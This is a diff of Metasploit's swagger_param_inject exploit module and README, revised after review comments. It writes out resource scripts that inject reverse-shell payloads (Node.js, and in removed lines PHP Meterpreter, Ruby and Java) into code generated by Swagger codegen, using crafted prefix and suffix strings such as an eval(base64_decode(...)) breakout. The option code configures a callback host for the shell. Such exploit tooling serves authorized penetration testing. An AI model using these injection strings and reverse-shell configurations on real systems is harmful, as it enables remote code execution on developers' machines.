updated as per @egypt & @todb-r7 recommendations.

documentation/modules/exploit/multi/fileformat/swagger_param_inject/README.md

@@ -32,70 +32,18 @@ This attack looks to inject a payload into javascript by terminating a URL path
 [nodejs-codegen](nodejs-codegen.rc)
 
 ```
-set PAYLOAD nodejs/shell_reverse_tcp
 
+set PAYLOAD nodejs/shell_reverse_tcp
 use exploit/multi/fileformat/swagger_param_inject
 
 set INFO_VERSION "1.0.0"
 set PAYLOAD_LOC "PATH"
 set PAYLOAD_PREFIX "/a');};};return exports;}));"
 set PAYLOAD_SUFFIX "(function(){}(this,function(){a=function(){b=function(){new Array('"
-
+set SWAGGER_HOST "localhost"
 run 
 ```
 
-**PHP**
-
-This attack takes advantage of injection of variables into multiline comment area.
-
-[php-codegen](php-codegen.rc)
-
-```
-set PAYLOAD php/meterpreter/reverse_tcp 
-
-use exploit/multi/fileformat/swagger_param_inject
-
-set PAYLOAD_PREFIX "*/ namespace foobar; eval(base64_decode('"
-set PAYLOAD_SUFFIX "')); /*"
-
-run 
-```
-
-
-**Ruby**
-
-This attack takes advantage of injection of variables into multiline comment area.
-
-[ruby-codegen](ruby-codegen.rc)
-
-```
-set PAYLOAD ruby/shell_reverse_tcp 
-
-use exploit/multi/fileformat/swagger_param_inject
-
-set PAYLOAD_LOC "INFO_TITLE"
-set PAYLOAD_PREFIX "=end "
-set INFO_DESCRIPTION "=begin "
-
-run 
-```
-
-**Java**
-
-This attack looks to inject a payload into javascript by terminating a URL path string, and placing code inline without causing runtime errors.
-
-[java-codegen](java-codegen.rc)
-
-```
-set PAYLOAD java/jsp_shell_reverse_tcp 
-
-use exploit/multi/fileformat/swagger_param_inject
-
-set PAYLOAD_LOC "PATH"
-set PAYLOAD_PREFIX "a\\\"; "
-
-run 
-```
 
 ## Quick Test
 

modules/exploits/multi/fileformat/swagger_param_inject.rb

@@ -50,15 +50,14 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptAddress.new('LHOST', [true, 'Server IP or hostname that the swagger codegen will callback to.']),
         OptPort.new('LPORT', [true, 'Server port.']),
-        OptString.new('PAYLOAD', [false, 'Payload Injection']),
         OptString.new('PAYLOAD_PREFIX', [false, 'Payload Injection prefix', '']),
         OptString.new('PAYLOAD_SUFFIX', [false, 'Payload Injection suffix', '']),
-        OptString.new('PAYLOAD_LOC', [false, 'Payload insertion point','INFO_DESCRIPTION']),
+        OptString.new('PAYLOAD_LOC', [false, 'Payload insertion point', 'INFO_DESCRIPTION', ['INFO_DESCRIPTION', 'INFO_VERSION', 'INFO_TITLE', 'SWAGGER_HOST', 'BASE_PATH', 'PATH', 'PATH_DESRIPTION', 'PATH_RESPONSE_DESCRIPTION', 'DEFINITION_DESCRIPTION'] ]),
         OptString.new('INFO_DESCRIPTION', [true, 'Swagger info description', 'A']),
         OptString.new('INFO_VERSION', [true, 'Swagger info version.', 'B']),
         OptString.new('INFO_TITLE', [true, 'Swagger info title.', 'C']),
         OptEnum.new('SWAGGER_SCHEME', [true, 'Protocol scheme', 'http', ['http','https','ws','wss']]),
-        OptString.new('SWAGGER_HOST', [true, 'a valid hostname or IPv4', 'X.Y.Z.xyz']),
+        OptString.new('SWAGGER_HOST', [true, 'a valid hostname or IPv4']),
         OptString.new('BASE_PATH', [true, 'The root path of API on host.', '/']),
         OptString.new('PATH', [true, 'Path of request/response on root path.', '/a']),
         OptString.new('PATH_DESCRIPTION', [true, 'Description of a path request object', 'D']),